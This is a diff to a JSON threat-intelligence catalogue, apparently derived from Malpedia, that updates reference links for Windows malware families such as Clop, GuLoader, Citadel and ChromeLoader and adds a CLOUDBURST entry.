+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://twitter.com/ESETresearch/status/1366862946488451088",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders",
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers",
+ "https://www.secureworks.com/research/threat-profiles/bronze-president",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/",
+ "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/",
+ "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf",
+ "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
],
"synonyms": [],
"type": []
@@ -16566,7 +17633,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/"
+ "https://thorcert.notion.site/TTPs-9-f04ce99784874947978bd2947738ac92",
+ "https://blog.sekoia.io/peeking-at-reaper-surveillance-operations-against-north-korea-defectors/",
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
+ "https://threatmon.io/chinotto-backdoor-technical-analysis-of-the-apt-reapers-powerful/",
+ "https://www.boho.or.kr/data/reportView.do?bulletin_writing_sequence=67064"
],
"synonyms": [],
"type": []
@@ -16580,16 +17651,16 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy",
"https://documents.trendmicro.com/assets/white_papers/wp-finding-APTX-attributing-attacks-via-MITRE-TTPs.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
- "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
"https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf",
"https://community.riskiq.com/article/5fe2da7f",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
"https://community.riskiq.com/article/56fa1b2f",
"https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists",
- "https://nao-sec.org/2021/01/royal-road-redive.html",
- "https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02",
- "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://medium.com/@Sebdraven/how-to-unpack-chinoxy-backdoor-and-decipher-the-configuration-of-the-backdoor-4ffd98ca2a02"
],
"synonyms": [],
"type": []
@@ -16614,8 +17685,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chisel",
- "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
- "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/"
+ "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/",
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/"
],
"synonyms": [],
"type": []
@@ -16643,7 +17714,8 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.choziosi",
"https://cybergeeks.tech/chromeloader-browser-hijacker",
"https://redcanary.com/blog/chromeloader/",
- "https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html"
+ "https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html",
+ "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension"
],
"synonyms": [
"ChromeLoader"
@@ -16658,10 +17730,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
"https://securelist.com/chthonic-a-new-modification-of-zeus/68176/",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html"
],
"synonyms": [
"AndroKINS"
@@ -16689,10 +17761,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi",
- "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html",
- "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf",
"https://www.trendmicro.com/en_us/research/21/h/cinobi-banking-trojan-targets-users-of-cryptocurrency-exchanges-.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/",
+ "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html",
+ "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf"
],
"synonyms": [],
"type": []
@@ -16705,12 +17777,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel",
- "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/",
"https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
- "http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
"http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html",
+ "http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
+ "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
"https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals"
+ "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/"
],
"synonyms": [],
"type": []
@@ -16777,11 +17849,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
"https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/",
"https://asec.ahnlab.com/en/35981/",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/covid-19-phishing-lure-to-steal-and-mine-cryptocurrency/"
],
"synonyms": [],
@@ -16795,136 +17867,158 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.clop",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/",
- "https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks",
- "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/",
- "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/",
- "https://twitter.com/darb0ng/status/1338692764121251840",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-clop",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/",
- "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/",
- "https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
- "https://unit42.paloaltonetworks.com/clop-ransomware/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
- "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
- "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
- "https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/",
- "https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
- "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/",
- "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/",
- "https://github.com/Tera0017/TAFOF-Unpacker",
- "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.youtube.com/watch?v=PqGaZgepNTE",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/",
- "https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever",
"https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks",
+ "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/",
"https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://asec.ahnlab.com/en/19542/",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
"https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md",
+ "https://github.com/Tera0017/TAFOF-Unpacker",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/",
+ "https://www.youtube.com/watch?v=PqGaZgepNTE",
+ "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://twitter.com/darb0ng/status/1338692764121251840",
+ "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
+ "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
"https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/",
- "https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/"
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/",
+ "https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever",
+ "https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/",
+ "https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
+ "https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-clop",
+ "https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/",
+ "https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/",
+ "https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf",
+ "https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26",
+ "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://unit42.paloaltonetworks.com/clop-ransomware/",
+ "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://asec.ahnlab.com/en/19542/",
+ "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/",
+ "https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f",
+ "https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/"
],
"synonyms": [],
"type": []
},
"uuid": "8071f2d8-cc44-4682-845b-6f39a9f8b587",
- "value": "Clop"
+ "value": "Clop (Windows)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst",
+ "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3f320960-77a2-4525-8d19-95b6028ec0d5",
+ "value": "CLOUDBURST"
},
{
"description": "CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye",
- "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/",
- "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943",
- "https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/",
- "https://research.checkpoint.com/2020/guloader-cloudeye/",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://labs.vipre.com/unloading-the-guloader/",
- "https://twitter.com/VK_Intel/status/1252678206852907011",
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader",
- "https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html",
- "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/",
- "https://malwation.com/malware-config-extraction-diaries-1-guloader/",
- "https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
- "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/",
- "https://www.youtube.com/watch?v=N0wAh26wShE",
- "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland",
- "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/",
- "https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/",
- "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
- "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/",
- "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
- "https://blog.morphisec.com/guloader-the-rat-downloader",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/",
- "https://twitter.com/TheEnergyStory/status/1240608893610459138",
- "https://twitter.com/VK_Intel/status/1257206565146370050",
- "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/",
- "https://www.crowdstrike.com/blog/guloader-malware-analysis/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
"https://labs.k7computing.com/?p=20156",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195",
- "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4",
- "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader",
"https://www.joesecurity.org/blog/3535317197858305930",
- "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
- "https://twitter.com/TheEnergyStory/status/1239110192060608513",
- "https://twitter.com/VK_Intel/status/1255537954304524288",
- "https://labs.k7computing.com/?p=21725Lokesh",
- "https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two",
+ "https://blog.morphisec.com/guloader-the-rat-downloader",
+ "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/",
+ "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
"https://twitter.com/sysopfb/status/1258809373159305216",
- "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader",
+ "https://www.youtube.com/watch?v=-FxyzuRv6Wg",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://research.checkpoint.com/2020/guloader-cloudeye/",
+ "https://twitter.com/TheEnergyStory/status/1240608893610459138",
+ "https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/",
+ "https://www.youtube.com/watch?v=N0wAh26wShE",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.youtube.com/watch?v=K3Yxu_9OUxU",
+ "https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/",
+ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
+ "https://twitter.com/TheEnergyStory/status/1239110192060608513",
+ "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
